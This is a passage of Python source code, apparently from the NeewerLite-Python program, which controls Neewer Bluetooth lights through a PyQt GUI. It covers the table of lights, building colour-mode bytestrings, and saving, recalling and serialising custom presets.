currentRow = rowToChange # change data for the specified row
# THIS SECTION BELOW LIMITS UPDATING THE TABLE **ONLY** IF THE DATA SUPPLIED IS DIFFERENT THAN IT WAS ORIGINALLY
if infoArray[0] != "": # the name of the light
if rowToChange == -1 or (rowToChange != -1 and infoArray[0] != self.returnTableInfo(rowToChange, 0)):
self.lightTable.item(currentRow, 0).setText(infoArray[0])
if infoArray[1] != "": # the MAC address of the light
if rowToChange == -1 or (rowToChange != -1 and infoArray[1] != self.returnTableInfo(rowToChange, 1)):
self.lightTable.item(currentRow, 1).setText(infoArray[1])
if infoArray[2] != "": # the Linked status of the light
if rowToChange == -1 or (rowToChange != -1 and infoArray[2] != self.returnTableInfo(rowToChange, 2)):
self.lightTable.item(currentRow, 2).setText(infoArray[2])
self.lightTable.item(currentRow, 2).setTextAlignment(Qt.AlignCenter) # align the light status info to be center-justified
if infoArray[3] != "": # the current status message of the light
if rowToChange == -1 or (rowToChange != -1 and infoArray[3] != self.returnTableInfo(rowToChange, 3)):
self.lightTable.item(currentRow, 3).setText(infoArray[3])
self.lightTable.resizeRowsToContents()
def returnTableInfo(self, row, column):
return self.lightTable.item(row, column).text()
# CLEAR ALL LIGHTS FROM THE TABLE VIEW
def clearTheTable(self):
if self.lightTable.rowCount() != 0:
self.lightTable.clearContents()
self.lightTable.setRowCount(0)
def selectRows(self, rowsToSelect):
self.lightTable.clearSelection()
indexes = [self.lightTable.model().index(r, 0) for r in rowsToSelect]
[self.lightTable.selectionModel().select(i, QItemSelectionModel.Select | QItemSelectionModel.Rows) for i in indexes]
# TELL THE BACKGROUND THREAD TO START LOOKING FOR LIGHTS
def startSelfSearch(self):
global threadAction
threadAction = "discover"
self.statusBar.showMessage("Please wait - searching for Neewer lights...")
# TELL THE BACKGROUND THREAD TO START CONNECTING TO LIGHTS
def startConnect(self):
global threadAction
threadAction = "connect"
# TELL THE BACKGROUND THREAD TO START SENDING TO THE LIGHTS
def startSend(self):
global threadAction
if threadAction == "":
threadAction = "send"
# IF YOU CLICK ON ONE OF THE TABS, THIS WILL SWITCH THE VIEW/SEND A NEW SIGNAL FROM THAT SPECIFIC TAB
def tabChanged(self, i):
currentSelection = self.selectedLights() # get the list of currently selected lights
if i == 0: # we clicked on the CCT tab
if len(currentSelection) > 0: # if we have something selected
if len(currentSelection) == 1: # if we have just one light selected
# CHECK THE CURRENT SELECTED LIGHT TO SEE IF IT CAN USE EXTENDED COLOR TEMPERATURES
self.checkLightTab(currentSelection[0]) # set up the current light's CCT bounds
if availableLights[currentSelection[0]][6] != False: # only recalculate the CCT value if the selected light is currently turned on
self.computeValueCCT() # calculate the current CCT value
else: # if we have more than one light selected
self.checkLightTab() # reset the bounds to the normal values (5600K)
elif i == 1: # we clicked on the HSI tab
if len(currentSelection) == 1: # if we have only one thing selected
if availableLights[currentSelection[0]][6] != False: # only recalculate the HSI value if the selected light is currently turned on
self.computeValueHSI() # calculate the current HSI value
elif i == 2: # we clicked on the ANM tab
pass # skip this, we don't want the animation automatically triggering when we go to this page - but keep it for readability
elif i == 3: # we clicked on the PREFS tab
if len(currentSelection) == 1: # the Prefs tab should only be reachable with exactly one light selected, but check just in case
self.setupLightPrefsTab(currentSelection[0])
elif i == 4: # we clicked on the Global PREFS tab
self.setupGlobalLightPrefsTab()
# COMPUTE A BYTESTRING FOR THE CCT SECTION
def computeValueCCT(self, hueOrBrightness = -1):
global CCTSlider
# CCTSlider = -1 # force this value to -1 to send both hue and brightness at the same time on SNL-660
CCTSlider = hueOrBrightness # set the global CCT "current slider" to the slider you just... slid
self.TFV_CCT_Hue.setText(str(self.Slider_CCT_Hue.value()) + "00K")
calculateByteString(colorMode="CCT",\
temp=str(int(self.Slider_CCT_Hue.value())),\
brightness=str(int(self.Slider_CCT_Bright.value())))
self.statusBar.showMessage("Current value (CCT Mode): " + updateStatus())
self.startSend()
# COMPUTE A BYTESTRING FOR THE HSI SECTION
def computeValueHSI(self):
calculateByteString(colorMode="HSI",\
HSI_H=str(int(self.Slider_HSI_1_H.value())),\
HSI_S=str(int(self.Slider_HSI_2_S.value())),\
HSI_I=str(int(self.Slider_HSI_3_L.value())))
self.statusBar.showMessage("Current value (HSI Mode): " + updateStatus())
self.startSend()
# COMPUTE A BYTESTRING FOR THE ANIM SECTION
def computeValueANM(self, buttonPressed):
global lastAnimButtonPressed
if buttonPressed == 0:
buttonPressed = lastAnimButtonPressed
else:
# CHANGE THE OLD BUTTON COLOR BACK TO THE DEFAULT COLOR
if lastAnimButtonPressed == 1:
self.Button_1_police_A.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 2:
self.Button_1_police_B.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 3:
self.Button_1_police_C.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 4:
self.Button_2_party_A.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 5:
self.Button_2_party_B.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 6:
self.Button_2_party_C.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 7:
self.Button_3_lightning_A.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 8:
self.Button_3_lightning_B.setStyleSheet("background-color : None")
elif lastAnimButtonPressed == 9:
self.Button_3_lightning_C.setStyleSheet("background-color : None")
# CHANGE THE NEW BUTTON COLOR TO SHOW WHICH ANIMATION WE'RE CURRENTLY ON
if buttonPressed == 1:
self.Button_1_police_A.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 2:
self.Button_1_police_B.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 3:
self.Button_1_police_C.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 4:
self.Button_2_party_A.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 5:
self.Button_2_party_B.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 6:
self.Button_2_party_C.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 7:
self.Button_3_lightning_A.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 8:
self.Button_3_lightning_B.setStyleSheet("background-color : aquamarine")
elif buttonPressed == 9:
self.Button_3_lightning_C.setStyleSheet("background-color : aquamarine")
lastAnimButtonPressed = buttonPressed
calculateByteString(colorMode="ANM",\
brightness=str(int(self.Slider_ANM_Brightness.value())),\
animation=str(buttonPressed))
self.statusBar.showMessage("Current value (ANM Mode): " + updateStatus())
self.startSend()
def turnLightOn(self):
setPowerBytestring("ON")
self.statusBar.showMessage("Turning light on")
self.startSend()
def turnLightOff(self):
setPowerBytestring("OFF")
self.statusBar.showMessage("Turning light off")
self.startSend()
# ==============================================================
# FUNCTIONS TO RETURN / MODIFY VALUES RUNNING IN THE GUI
# ==============================================================
# RETURN THE ROW INDEXES THAT ARE CURRENTLY HIGHLIGHTED IN THE TABLE VIEW
def selectedLights(self):
selectionList = []
if threadAction != "quit":
currentSelection = self.lightTable.selectionModel().selectedRows()
for a in range(len(currentSelection)):
selectionList.append(currentSelection[a].row()) # add the row index of the nth selected light to the selectionList array
return selectionList # return the row IDs that are currently selected, or an empty array ([]) otherwise
# UPDATE THE TABLE WITH THE CURRENT INFORMATION FROM availableLights
def updateLights(self, updateTaskbar = True):
self.clearTheTable()
if updateTaskbar == True: # if we're scanning for lights, then update the taskbar - if we're just sorting, then don't
if len(availableLights) != 0: # if we found lights on the last scan
if self.scanCommandButton.text() == "Scan":
self.scanCommandButton.setText("Re-scan") # change the "Scan" button to "Re-scan"
if len(availableLights) == 1: # we found 1 light
self.statusBar.showMessage("We located 1 Neewer light on the last search")
elif len(availableLights) > 1: # we found more than 1 light
self.statusBar.showMessage("We located " + str(len(availableLights)) + " Neewer lights on the last search")
else: # if we didn't find any (additional) lights on the last scan
self.statusBar.showMessage("We didn't locate any Neewer lights on the last search")
for a in range(len(availableLights)):
if availableLights[a][1] == "": # the light does not currently have a Bleak object connected to it
if availableLights[a][2] != "": # the light has a custom name, so add the custom name to the light
self.setTheTable([availableLights[a][2] + " (" + availableLights[a][0].name + ")" + "\n [ʀssɪ: " + str(availableLights[a][0].rssi) + " dBm]", availableLights[a][0].address, "Waiting", "Waiting to connect..."])
else: # the light does not have a custom name, so just use the model # of the light
self.setTheTable([availableLights[a][0].name + "\n [ʀssɪ: " + str(availableLights[a][0].rssi) + " dBm]", availableLights[a][0].address, "Waiting", "Waiting to connect..."])
else: # the light does have a Bleak object connected to it
if availableLights[a][2] != "": # the light has a custom name, so add the custom name to the light
if availableLights[a][1].is_connected: # we have a connection to the light
self.setTheTable([availableLights[a][2] + " (" + availableLights[a][0].name + ")" + "\n [ʀssɪ: " + str(availableLights[a][0].rssi) + " dBm]", availableLights[a][0].address, "LINKED", "Waiting to send..."])
else: # we're still trying to connect, or haven't started trying yet
self.setTheTable([availableLights[a][2] + " (" + availableLights[a][0].name + ")" + "\n [ʀssɪ: " + str(availableLights[a][0].rssi) + " dBm]", availableLights[a][0].address, "Waiting", "Waiting to connect..."])
else: # the light does not have a custom name, so just use the model # of the light
if availableLights[a][1].is_connected:
self.setTheTable([availableLights[a][0].name + "\n [ʀssɪ: " + str(availableLights[a][0].rssi) + " dBm]", availableLights[a][0].address, "LINKED", "Waiting to send..."])
else:
self.setTheTable([availableLights[a][0].name + "\n [ʀssɪ: " + str(availableLights[a][0].rssi) + " dBm]", availableLights[a][0].address, "Waiting", "Waiting to connect..."])
# THE FINAL FUNCTION TO UNLINK ALL LIGHTS WHEN QUITTING THE PROGRAM
def closeEvent(self, event):
global threadAction
# WAIT UNTIL THE BACKGROUND THREAD SETS THE threadAction FLAG TO finished SO WE CAN UNLINK THE LIGHTS
while threadAction != "finished": # wait until the background thread has a chance to terminate
printDebugString("Waiting for the background thread to terminate...")
threadAction = "quit" # make sure to tell the thread to quit again (if it missed it the first time)
time.sleep(2)
if rememberPresetsOnExit == True:
printDebugString("You asked NeewerLite-Python to save the custom parameters on exit, so we will do that now...")
customPresetsToWrite = [] # the list of custom presets to write to file
# CHECK EVERY SINGLE CUSTOM PRESET AGAINST THE "DEFAULT" LIST, AND IF IT'S DIFFERENT, THEN LOG THAT ONE
if customLightPresets[0] != defaultLightPresets[0]:
customPresetsToWrite.append(customPresetToString(0))
if customLightPresets[1] != defaultLightPresets[1]:
customPresetsToWrite.append(customPresetToString(1))
if customLightPresets[2] != defaultLightPresets[2]:
customPresetsToWrite.append(customPresetToString(2))
if customLightPresets[3] != defaultLightPresets[3]:
customPresetsToWrite.append(customPresetToString(3))
if customLightPresets[4] != defaultLightPresets[4]:
customPresetsToWrite.append(customPresetToString(4))
if customLightPresets[5] != defaultLightPresets[5]:
customPresetsToWrite.append(customPresetToString(5))
if customLightPresets[6] != defaultLightPresets[6]:
customPresetsToWrite.append(customPresetToString(6))
if customLightPresets[7] != defaultLightPresets[7]:
customPresetsToWrite.append(customPresetToString(7))
if customPresetsToWrite != []: # if there are any altered presets, then write them to the custom presets file
createLightPrefsFolder() # create the light_prefs folder if it doesn't exist
# WRITE THE PREFERENCES FILE
with open(customLightPresetsFile, "w") as prefsFileToWrite:
prefsFileToWrite.write("\n".join(customPresetsToWrite))
printDebugString("Exported custom presets to " + customLightPresetsFile)
else:
if os.path.exists(customLightPresetsFile):
printDebugString("There were no changed custom presets, so we're deleting the custom presets file!")
os.remove(customLightPresetsFile) # if there are no presets to save, then delete the custom presets file
# Keep in mind, all of the light parameters are saved FIRST, and only after that do we try to unlink from the lights
if rememberLightsOnExit == True:
printDebugString("You asked NeewerLite-Python to save the last used light parameters on exit, so we will do that now...")
for a in range(len(availableLights)):
printDebugString("Saving last used parameters for light #" + str(a + 1) + " (" + str(a + 1) + " of " + str(len(availableLights)) + ")")
self.saveLightPrefs(a)
# THE THREAD HAS TERMINATED, NOW CONTINUE...
printDebugString("We will now attempt to unlink from the lights...")
self.statusBar.showMessage("Quitting program - unlinking from lights...")
QApplication.processEvents() # force the status bar to update
loop = asyncio.get_event_loop()
loop.run_until_complete(parallelAction("disconnect", [-1])) # disconnect from all lights in parallel
printDebugString("Closing the program NOW")
def saveCustomPresetDialog(self, numOfPreset):
if (QApplication.keyboardModifiers() & Qt.AltModifier) == Qt.AltModifier: # if you have the ALT key held down
customLightPresets[numOfPreset] = defaultLightPresets[numOfPreset] # then restore the default for this preset
# And change the button display back to "PRESET GLOBAL"
if numOfPreset == 0:
self.customPreset_0_Button.markCustom(0, -1)
if numOfPreset == 1:
self.customPreset_1_Button.markCustom(1, -1)
if numOfPreset == 2:
self.customPreset_2_Button.markCustom(2, -1)
if numOfPreset == 3:
self.customPreset_3_Button.markCustom(3, -1)
if numOfPreset == 4:
self.customPreset_4_Button.markCustom(4, -1)
if numOfPreset == 5:
self.customPreset_5_Button.markCustom(5, -1)
if numOfPreset == 6:
self.customPreset_6_Button.markCustom(6, -1)
if numOfPreset == 7:
self.customPreset_7_Button.markCustom(7, -1)
else:
if len(availableLights) == 0: # if we don't have lights, then we can't save a preset!
errDlg = QMessageBox(self)
errDlg.setWindowTitle("Can't Save Preset!")
errDlg.setText("You can't save a custom preset at the moment because you don't have any lights set up yet. To save a custom preset, connect a light to NeewerLite-Python first.")
errDlg.addButton("OK", QMessageBox.ButtonRole.AcceptRole)
errDlg.setIcon(QMessageBox.Warning)
errDlg.exec_()
else: # we have lights, we can do it!
selectedLights = self.selectedLights() # get the currently selected lights
saveDlg = QMessageBox(self)
saveDlg.setWindowTitle("Save a Custom Preset")
saveDlg.setTextFormat(Qt.TextFormat.RichText)
saveDlg.setText("Would you like to save a <em>Global</em> or <em>Snapshot</em> preset for preset " + str(numOfPreset + 1) + "?" + "<hr>"
"A <em>Global Preset</em> saves only the currently set global parameters (mode, hue, color temperature, brightness, etc.) and applies that global preset to all the lights that are currently selected.<br><br>"
"A <em>Snapshot Preset</em> saves the currently set parameters for each light individually, allowing you to recall more complex lighting setups. You can also either set a <em>snapshot preset</em> for a series of selected lights (you have to select 1 or more lights for this option), or all the currently available lights. If you save a <em>snapshot preset</em> of a series of selected lights, it will only apply the settings for those specific lights.")
saveDlg.addButton(" Global Preset ", QMessageBox.ButtonRole.YesRole)
saveDlg.addButton(" Snapshot Preset - All Lights ", QMessageBox.ButtonRole.YesRole)
selectedLightsQuestion = 0
if selectedLights != []:
saveDlg.addButton(" Snapshot Preset - Selected Lights ", QMessageBox.ButtonRole.YesRole)
selectedLightsQuestion = 1
saveDlg.addButton(" Cancel ", QMessageBox.ButtonRole.RejectRole)
saveDlg.setIcon(QMessageBox.Question)
clickedButton = saveDlg.exec_()
if clickedButton == 0: # save a "Global" preset
saveCustomPreset("global", numOfPreset)
elif clickedButton == 1: # save a "Snapshot" preset with all lights
saveCustomPreset("snapshot", numOfPreset)
elif clickedButton == 2: # save a "Snapshot" preset with only the selected lights
saveCustomPreset("snapshot", numOfPreset, selectedLights)
if clickedButton != (2 + selectedLightsQuestion): # if we didn't cancel out, then mark that button as being "custom"
if numOfPreset == 0:
self.customPreset_0_Button.markCustom(0, clickedButton)
if numOfPreset == 1:
self.customPreset_1_Button.markCustom(1, clickedButton)
if numOfPreset == 2:
self.customPreset_2_Button.markCustom(2, clickedButton)
if numOfPreset == 3:
self.customPreset_3_Button.markCustom(3, clickedButton)
if numOfPreset == 4:
self.customPreset_4_Button.markCustom(4, clickedButton)
if numOfPreset == 5:
self.customPreset_5_Button.markCustom(5, clickedButton)
if numOfPreset == 6:
self.customPreset_6_Button.markCustom(6, clickedButton)
if numOfPreset == 7:
self.customPreset_7_Button.markCustom(7, clickedButton)
def highlightLightsForSnapshotPreset(self, numOfPreset, exited = False):
global lastSelection
if exited == False: # if we're entering a snapshot preset, then highlight the affected lights in green
toolTip = customPresetInfoBuilder(numOfPreset)
# LOAD A NEWLY GENERATED TOOLTIP FOR EVERY HOVER
if numOfPreset == 0:
self.customPreset_0_Button.setToolTip(toolTip)
elif numOfPreset == 1:
self.customPreset_1_Button.setToolTip(toolTip)
elif numOfPreset == 2:
self.customPreset_2_Button.setToolTip(toolTip)
elif numOfPreset == 3:
self.customPreset_3_Button.setToolTip(toolTip)
elif numOfPreset == 4:
self.customPreset_4_Button.setToolTip(toolTip)
elif numOfPreset == 5:
self.customPreset_5_Button.setToolTip(toolTip)
elif numOfPreset == 6:
self.customPreset_6_Button.setToolTip(toolTip)
elif numOfPreset == 7:
self.customPreset_7_Button.setToolTip(toolTip)
lightsToHighlight = self.checkForSnapshotPreset(numOfPreset)
if lightsToHighlight != []:
lastSelection = self.selectedLights() # store the current selection to restore it when leaving the control
self.lightTable.clearSelection() # clear the current selection to allow the preset to shine
for a in range(len(lightsToHighlight)):
for b in range(4):
self.lightTable.item(lightsToHighlight[a], b).setBackground(QColor(113, 233, 147)) # set the affected rows the same color as the snapshot button
else: # if we're exiting a snapshot preset, then reset the color of the affected lights back to white
lightsToHighlight = self.checkForSnapshotPreset(numOfPreset)
if lightsToHighlight != []:
self.selectRows(lastSelection) # re-highlight the last selected lights on exit
for a in range(len(lightsToHighlight)):
for b in range(4):
self.lightTable.item(lightsToHighlight[a], b).setBackground(Qt.white) # clear formatting on the previously selected rows
def checkForSnapshotPreset(self, numOfPreset):
if customLightPresets[numOfPreset][0][0] != -1: # if the value is not -1, then we most likely have a snapshot preset
lightsToHighlight = []
for a in range(len(customLightPresets[numOfPreset])): # check each entry in the preset for matching lights
currentLight = returnLightIndexesFromMacAddress(customLightPresets[numOfPreset][a][0])
if currentLight != []: # if we have a match, add it to the list of lights to highlight
lightsToHighlight.append(currentLight[0])
return lightsToHighlight
else:
return [] # if we don't have a snapshot preset, then just return an empty list (no lights directly affected)
# SET UP THE GUI BASED ON COMMAND LINE ARGUMENTS
def setUpGUI(self, **modeArgs):
if modeArgs["colorMode"] == "CCT":
self.ColorModeTabWidget.setCurrentIndex(0)
self.Slider_CCT_Hue.setValue(modeArgs["temp"])
self.Slider_CCT_Bright.setValue(modeArgs["brightness"])
self.computeValueCCT()
elif modeArgs["colorMode"] == "HSI":
self.ColorModeTabWidget.setCurrentIndex(1)
self.Slider_HSI_1_H.setValue(modeArgs["hue"])
self.Slider_HSI_2_S.setValue(modeArgs["sat"])
self.Slider_HSI_3_L.setValue(modeArgs["brightness"])
self.computeValueHSI()
elif modeArgs["colorMode"] == "ANM":
self.ColorModeTabWidget.setCurrentIndex(2)
self.Slider_ANM_Brightness.setValue(modeArgs["brightness"])
self.computeValueANM(modeArgs["scene"])
except NameError:
pass # could not load the GUI, but we have already logged an error message
# WORKING WITH CUSTOM PRESETS
def customPresetInfoBuilder(numOfPreset, formatForHTTP = False):
toolTipBuilder = [] # constructor for the tooltip
numOfLights = len(customLightPresets[numOfPreset]) # the number of lights in this specific preset
if numOfLights == 1 and customLightPresets[numOfPreset][0][0] == -1: # we're looking at a global preset
if formatForHTTP == False:
toolTipBuilder.append("[GLOBAL PRESET]")
else:
toolTipBuilder.append("<STRONG>[GLOBAL PRESET]</STRONG>")
else: # we're looking at a snapshot preset
if formatForHTTP == False:
toolTipBuilder.append("[SNAPSHOT PRESET]")
else:
toolTipBuilder.append("<STRONG>[SNAPSHOT PRESET]</STRONG>")
toolTipBuilder.append("")
for a in range(numOfLights): # write out a little description of each part of this preset
if customLightPresets[numOfPreset][a][0] == -1:
if formatForHTTP == False:
toolTipBuilder.append(" FOR: ALL SELECTED LIGHTS") # this is a global preset, and it affects all *selected* lights
else:
toolTipBuilder.append(" FOR: ALL LIGHTS AVAILABLE") # this is a global preset, and it affects all lights
else:
currentLight = returnLightIndexesFromMacAddress(customLightPresets[numOfPreset][a][0]) # find the light in the current list
if currentLight != []: # if we have a match, add it to the list of lights to highlight
if availableLights[currentLight[0]][2] != "": # if the custom name is filled in
toolTipBuilder.append(" FOR: " + availableLights[currentLight[0]][2] + " [" + availableLights[currentLight[0]][0].name + "]")
else:
toolTipBuilder.append(" FOR: " + availableLights[currentLight[0]][0].name)
else:
toolTipBuilder.append("FOR: ---LIGHT NOT AVAILABLE AT THE MOMENT---") # if the light is not found (yet), display that
toolTipBuilder.append(" " + customLightPresets[numOfPreset][a][0] + "") # this is a snapshot preset, and this specific preset controls this light
if customLightPresets[numOfPreset][a][1][0] == 5:
if formatForHTTP == False:
toolTipBuilder.append(" > MODE: CCT / TEMP: " + str(customLightPresets[numOfPreset][a][1][2]) + "00K / BRIGHTNESS: " + str(customLightPresets[numOfPreset][a][1][1]) + "% < ")
else:
toolTipBuilder.append(" > MODE: CCT / TEMP: " + str(customLightPresets[numOfPreset][a][1][2]) + "00K / BRIGHTNESS: " + str(customLightPresets[numOfPreset][a][1][1]) + "% < ")
elif customLightPresets[numOfPreset][a][1][0] == 4:
if formatForHTTP == False:
toolTipBuilder.append(" > MODE: HSI / H: " + str(customLightPresets[numOfPreset][a][1][2]) + "º / S: " + str(customLightPresets[numOfPreset][a][1][3]) + "% / I: " + str(customLightPresets[numOfPreset][a][1][1]) + "% < ")
else: # if we're sending this string back for the HTTP server, then replace the degree with the HTML version
toolTipBuilder.append(" > MODE: HSI / H: " + str(customLightPresets[numOfPreset][a][1][2]) + "° / S: " + str(customLightPresets[numOfPreset][a][1][3]) + "% / I: " + str(customLightPresets[numOfPreset][a][1][1]) + "% < ")
elif customLightPresets[numOfPreset][a][1][0] == 6:
if formatForHTTP == False:
toolTipBuilder.append(" > MODE: SCENE / ANIMATION: " + str(customLightPresets[numOfPreset][a][1][2]) + " / BRIGHTNESS: " + str(customLightPresets[numOfPreset][a][1][1]) + "% < ")
else:
toolTipBuilder.append(" > MODE: SCENE / ANIMATION: " + str(customLightPresets[numOfPreset][a][1][2]) + " / BRIGHTNESS: " + str(customLightPresets[numOfPreset][a][1][1]) + "% < ")
else: # if we're set to turn the light off, show that here
if formatForHTTP == False:
toolTipBuilder.append(" > TURN THIS LIGHT OFF < ")
else:
toolTipBuilder.append(" > TURN THIS LIGHT OFF < ")
if numOfLights > 1 and a < (numOfLights - 1): # if we have any more lights, then separate each one
if formatForHTTP == False:
toolTipBuilder.append("----------------------------")
else:
toolTipBuilder.append("")
if formatForHTTP == False:
return "\n".join(toolTipBuilder)
else:
return "<BR>".join(toolTipBuilder)
def recallCustomPreset(numOfPreset, updateGUI=True, loop=None):
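# Preset entries store a simplified mode code (built by listBuilder below): 5 = CCT, 4 = HSI, 6 = ANM/SCENE
# when the light was on, and 8 / 7 / 9 respectively when the light should also be switched off on recall.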
global availableLights
global lastSelection
changedLights = [] # if a snapshot preset exists in this setting, log the lights that are to be changed here
for a in range(len(customLightPresets[numOfPreset])): # check all the entries stored in this preset
if customLightPresets[numOfPreset][0][0] == -1: # we're looking at a global preset, so set the light(s) up accordingly
if updateGUI == True: # if we are in the GUI
if mainWindow.selectedLights() == []: # and no lights are selected in the light selector
mainWindow.lightTable.selectAll() # select all of the lights available
time.sleep(0.2)
if customLightPresets[numOfPreset][0][1][0] == 5: # the preset is in CCT mode
p_colorMode = "CCT"
p_brightness = customLightPresets[numOfPreset][0][1][1]
p_temp = customLightPresets[numOfPreset][0][1][2]
if updateGUI == True:
mainWindow.setUpGUI(colorMode=p_colorMode, brightness=p_brightness, temp=p_temp)
else:
computedValue = calculateByteString(True, colorMode=p_colorMode, brightness=p_brightness, temp=p_temp)
elif customLightPresets[numOfPreset][0][1][0] == 4: # the preset is in HSI mode
p_colorMode = "HSI"
# Due to the way the custom presets store information (brightness is always first),
# this section is broken up into H, S and I portions for readability
p_hue = customLightPresets[numOfPreset][0][1][2]
p_sat = customLightPresets[numOfPreset][0][1][3]
p_int = customLightPresets[numOfPreset][0][1][1]
if updateGUI == True:
mainWindow.setUpGUI(colorMode=p_colorMode, hue=p_hue, sat=p_sat, brightness=p_int)
else:
computedValue = calculateByteString(True, colorMode=p_colorMode, HSI_H=p_hue, HSI_S=p_sat, HSI_I=p_int)
elif customLightPresets[numOfPreset][0][1][0] == 6: # the preset is in ANM/SCENE mode
p_colorMode = "ANM"
p_brightness = customLightPresets[numOfPreset][0][1][1]
p_scene = customLightPresets[numOfPreset][0][1][2]
if updateGUI == True:
mainWindow.setUpGUI(colorMode=p_colorMode, brightness=p_brightness, scene=p_scene)
else:
computedValue = calculateByteString(True, colorMode=p_colorMode, brightness=p_brightness, scene=p_scene)
if updateGUI == False:
for b in range(len(availableLights)):
changedLights.append(b) # add each light to changedLights
availableLights[b][3] = computedValue # set each light's "last" parameter to the computed value above
else: # we're looking at a snapshot preset, so see if any of those lights are available to change
currentLight = returnLightIndexesFromMacAddress(customLightPresets[numOfPreset][a][0])
if currentLight != []: # if we have a match
# always refer to the light it found as currentLight[0]
if customLightPresets[numOfPreset][a][1][0] == 5 or customLightPresets[numOfPreset][a][1][0] == 8: # the preset is in CCT mode
availableLights[currentLight[0]][3] = calculateByteString(True, colorMode="CCT",\
brightness=customLightPresets[numOfPreset][a][1][1],\
temp=customLightPresets[numOfPreset][a][1][2])
if customLightPresets[numOfPreset][a][1][0] == 8: # if we want to turn the light off, let the send system know this
availableLights[currentLight[0]][3][0] = 0
elif customLightPresets[numOfPreset][a][1][0] == 4 or customLightPresets[numOfPreset][a][1][0] == 7: # the preset is in HSI mode
availableLights[currentLight[0]][3] = calculateByteString(True, colorMode="HSI",\
HSI_I=customLightPresets[numOfPreset][a][1][1],\
HSI_H=customLightPresets[numOfPreset][a][1][2],\
HSI_S=customLightPresets[numOfPreset][a][1][3])
if customLightPresets[numOfPreset][a][1][0] == 7: # if we want to turn the light off, let the send system know this
availableLights[currentLight[0]][3][0] = 0
elif customLightPresets[numOfPreset][a][1][0] == 6 or customLightPresets[numOfPreset][a][1][0] == 9: # the preset is in ANM/SCENE mode
availableLights[currentLight[0]][3] = calculateByteString(True, colorMode="ANM",\
brightness=customLightPresets[numOfPreset][a][1][1],\
animation=customLightPresets[numOfPreset][a][1][2])
if customLightPresets[numOfPreset][a][1][0] == 9: # if we want to turn the light off, let the send system know this
availableLights[currentLight[0]][3][0] = 0
changedLights.append(currentLight[0])
if changedLights != []:
if updateGUI == True:
lastSelection = [] # clear the last selection if you've clicked on a snapshot preset (which, if we're here, you did)
mainWindow.lightTable.setFocus() # set the focus to the light table, in order to show which rows are selected
mainWindow.selectRows(changedLights) # select those rows affected by the lights above
global threadAction
threadAction = "send|" + "|".join(map(str, changedLights)) # set the thread to write to all of the affected lights
else:
processMultipleSends(loop, "send|" + "|".join(map(str, changedLights)), updateGUI)
def saveCustomPreset(presetType, numOfPreset, selectedLights = []):
global customLightPresets
if presetType == "global":
customLightPresets[numOfPreset] = [listBuilder(-1)]
elif presetType == "snapshot":
listConstructor = []
if selectedLights == []: # add all the lights to the snapshot preset
for a in range(len(availableLights)):
listConstructor.append(listBuilder(a))
else: # add only the selected lights to the snapshot preset
for a in range(len(selectedLights)):
listConstructor.append(listBuilder(selectedLights[a]))
customLightPresets[numOfPreset] = listConstructor
def listBuilder(selectedLight):
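# Builds [MAC address (or -1 for a global preset), [mode code, brightness, ...]] from the light's last sent
# bytestring. The mode code is the raw mode byte minus 130 if the light is on (CCT 135 -> 5, HSI 134 -> 4,
# ANM 136 -> 6) or minus 127 if it is off (-> 8, 7, 9), which is what recallCustomPreset checks against.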
paramsListBuilder = [] # the cut-down list of parameters to return to the main preset constructor
if selectedLight == -1: # then we get the value from sendValue
lightMACAddress = -1 # this is a global preset
listToWorkWith = sendValue # we're using the last sent parameter on any light for this
else: # we're recalling the params for a specific light
lightMACAddress = availableLights[selectedLight][0].address # this is a snapshot preset
listToWorkWith = availableLights[selectedLight][3] # we're specifically using the last parameter for the specified light for this
if listToWorkWith != []: # if we have elements in this list, then sort them out
if availableLights[selectedLight][6] == False:
paramsListBuilder.append(listToWorkWith[1] - 127) # the first value is the mode, but -127 to simplify it (and mark it as being OFF)
else:
paramsListBuilder.append(listToWorkWith[1] - 130) # the first value is the mode, but -130 to simplify it (and mark it as being ON)
if listToWorkWith[1] == 135: # we're in CCT mode
paramsListBuilder.append(listToWorkWith[3]) # the brightness
paramsListBuilder.append(listToWorkWith[4]) # the color temperature
elif listToWorkWith[1] == 134: # we're in HSI mode
paramsListBuilder.append(listToWorkWith[6]) # the brightness
paramsListBuilder.append(listToWorkWith[3] + (256 * listToWorkWith[4])) # the hue
paramsListBuilder.append(listToWorkWith[5]) # the saturation
elif listToWorkWith[1] == 136: # we're in ANM/SCENE
paramsListBuilder.append(listToWorkWith[3]) # the brightness
paramsListBuilder.append(listToWorkWith[4]) # the scene
return [lightMACAddress, paramsListBuilder]
def customPresetToString(numOfPreset):
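# Serializes a preset into the form written to the custom presets file - e.g. a global CCT preset
# (5600K @ 100%) becomes "customPreset0=-1|5|100|56", and a snapshot preset separates each light's
# "MAC|mode|params..." chunk with a semicolon.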
returnedString = "customPreset" + str(numOfPreset) + "=" # the string to return back to the saving mechanism
numOfLights = len(customLightPresets[numOfPreset]) # how many lights this custom preset holds values for
for a in range(numOfLights): # get all of the lights stored in this preset (or 1 if it's a global)
returnedString += str(customLightPresets[numOfPreset][a][0]) # get the MAC address/UUID of the nth light
returnedString += "|" + "|".join(map(str,customLightPresets[numOfPreset][a][1])) # get a string for the rest of this current array
if numOfLights > 1 and a < (numOfLights - 1): # if there are more lights left, then add a semicolon to differentiate that
returnedString += ";"
return returnedString
def stringToCustomPreset(presetString, numOfPreset):
if presetString != "|": # if the string is a valid string, then process it
lightsToWorkWith = presetString.split(";") # split the current string into individual lights
presetToReturn = [] # a list containing all of the preset information
for a in range(len(lightsToWorkWith)):
presetList = lightsToWorkWith[a].split("|") # split the current light list into its individual items
presetPayload = [] # the actual preset list
for b in range(1, len(presetList)):
presetPayload.append(int(presetList[b]))
if presetList[0] == "-1":
presetToReturn.append([-1, presetPayload]) # if the light ID is -1, keep that value as an integer
else:
presetToReturn.append([presetList[0], presetPayload]) # if it isn't, then the MAC address is a string, so keep it that way
return presetToReturn
